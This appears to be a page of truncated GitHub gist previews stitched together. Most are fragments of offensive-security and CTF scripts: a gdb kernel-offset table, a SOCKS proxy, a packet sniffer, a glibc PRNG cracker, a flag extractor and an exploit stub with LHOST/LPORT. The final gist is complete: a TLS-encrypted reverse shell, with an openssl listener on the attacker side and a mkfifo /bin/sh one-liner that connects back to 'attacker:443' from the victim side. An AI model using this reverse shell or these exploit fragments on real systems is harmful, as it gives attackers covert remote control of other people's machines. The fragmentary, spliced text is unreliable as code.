import gdb | |
import re | |
from collections import namedtuple | |
DETAILS = { | |
# API 24 playstore | |
# API 25 playstore | |
'3.10.0+': (0xC0887D20, 0xC092138C, 316, 0xC0A7754C, 4), | |
# API 26 playstore |
#!/usr/bin/env python3 | |
import logging | |
import select | |
import socket | |
import struct | |
from socketserver import ThreadingMixIn, TCPServer, StreamRequestHandler | |
logging.basicConfig(level=logging.DEBUG) | |
SOCKS_VERSION = 5 |
#!/usr/bin/env python | |
''' | |
It has been tested with either py2 or py3. | |
Beware ancient versions of Linux kernel which may not support SOCK_NONBLOCK | |
or the memory mapped ring buffer. | |
BPF filter listed below is compiled form of "not port 22" | |
if you want to change it, do something like |
#!/usr/bin/env python | |
import z3 | |
import sys | |
# glibc default PRNG | |
# it is called TYPE_3, and is an additive recursive generator | |
# its internal state is made of 31 32-bits integers | |
# r_0 ... r_30 | |
# each call to random will modify the internal state |
#!/usr/bin/env python | |
import os | |
import re | |
import zipfile | |
from cStringIO import StringIO | |
def process_file(f): | |
data = f.read() | |
for m in re.finditer(r'(FLAG[0-9a-zA-Z/+=]+)', data): |
#!/usr/bin/env python | |
import requests | |
import sys | |
from base64 import b64encode | |
LHOST = '172.16.89.1' | |
LPORT = 8888 |
#!/usr/bin/env python | |
import sys | |
import json | |
start_time = None | |
for line in sys.stdin.readlines(): | |
o = json.loads(line) | |
if type(o) != type([]): |
#!/usr/bin/env python | |
from selenium import webdriver | |
import selenium | |
import sys | |
import re | |
def take_screenshot(url, png): | |
options = webdriver.ChromeOptions() | |
options.add_argument('headless') |
from cStringIO import StringIO | |
from struct import pack | |
from binascii import unhexlify, hexlify | |
from itertools import count, dropwhile | |
VERBOSE = True | |
class Asn1Obj: | |
'''generic frame for ASN1 fields, supports nesting''' | |
def __init__(self, klass, constructed, type, indefinite, value=None, children=[], absorbed=None): |
# attacker side: create self-signed certificate and set up a listener | |
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes | |
openssl s_server -quiet -key key.pem -cert cert.pem -port 443 | |
# victim side: connect back to attacker using TLS | |
mkfifo fifo; /bin/sh -i < fifo 2>&1 | openssl s_client -quiet -connect attacker:443 > fifo; rm fifo |